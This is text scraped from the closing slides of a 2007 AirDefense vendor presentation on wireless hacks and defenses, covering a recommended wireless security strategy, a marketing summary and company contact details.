![Page 47: Www.airdefense.net War of the Airwaves Wireless Hacks & Defenses Richard Rushing Chief Security Officer AirDefense, Inc. rrushing@airdefense.net](https://reader037.vdocuments.mx/reader037/viewer/2022110322/56649d215503460f949f63f7/html5/thumbnails/47.jpg)
Copyright © 2002-2007 AirDefense Proprietary and Confidential.
Recommended Wireless Security Strategy
Contain and control authorized wireless devices, both inside owned facilities
and outside at hotspots, municipal wifi zones &
home
Automatically keep all unauthorized wireless devices off the entire wired network all the
time
Continually assure strong security
configurations and policies 24x7 on all authorized wireless
devices
Accurately detect (WIDS) and
automatically defend (WIPS) against the greatest number of
wireless attacks possible
Store and data mine long-term, forensics
quality information for investigations and
diagnosing wireless problems
Measure and prove compliance with
regulatory wireless security policies and
controls
47
![Page 48: Www.airdefense.net War of the Airwaves Wireless Hacks & Defenses Richard Rushing Chief Security Officer AirDefense, Inc. rrushing@airdefense.net](https://reader037.vdocuments.mx/reader037/viewer/2022110322/56649d215503460f949f63f7/html5/thumbnails/48.jpg)
Copyright © 2002-2007 AirDefense Proprietary and Confidential.
Wireless Security Can not Mitigate Risks
Flawed
It’s the Internet All over Telnet FTP HTTP
We still use them Risk vs. Threats
SHARED MEDIUM Easy comprise Remediation is Key Monitoring is Key
48
![Page 49: Www.airdefense.net War of the Airwaves Wireless Hacks & Defenses Richard Rushing Chief Security Officer AirDefense, Inc. rrushing@airdefense.net](https://reader037.vdocuments.mx/reader037/viewer/2022110322/56649d215503460f949f63f7/html5/thumbnails/49.jpg)
Copyright © 2002-2007 AirDefense Proprietary and Confidential.
Summary
Wireless is a business enabler and part of every network
Unmonitored wireless networks make the entire network
infrastructure vulnerable
Lack of policy compliance can result in regulatory liabilities
AirDefense offers market-leading solutions to provide
visibility and control of all wireless assets, regardless of
location
AirDefense solutions are trusted by the most security-
sensitive organizations in the world
AirDefense solutions are cost-effective & provide the lowest
TCO
49
![Page 50: Www.airdefense.net War of the Airwaves Wireless Hacks & Defenses Richard Rushing Chief Security Officer AirDefense, Inc. rrushing@airdefense.net](https://reader037.vdocuments.mx/reader037/viewer/2022110322/56649d215503460f949f63f7/html5/thumbnails/50.jpg)
Copyright © 2002-2007 AirDefense Proprietary and Confidential.
Contact us Web: www.AirDefense.NET HQs Phone: 770-663-8115 Demo of Laptop Products Available on www.AirDefense.NET
Contact: Anthony Perridge
Vice President, International
+44 1628 509058
50
http://www.airdefense.net/seminars/airdefense_europe_oct_2007.pdfhttp://www.airdefense.net/seminars/airdefense_europe_oct_2007.pdf
![Page 51: Www.airdefense.net War of the Airwaves Wireless Hacks & Defenses Richard Rushing Chief Security Officer AirDefense, Inc. rrushing@airdefense.net](https://reader037.vdocuments.mx/reader037/viewer/2022110322/56649d215503460f949f63f7/html5/thumbnails/51.jpg)
Copyright © 2002-2007 AirDefense Proprietary and Confidential.
Summary
51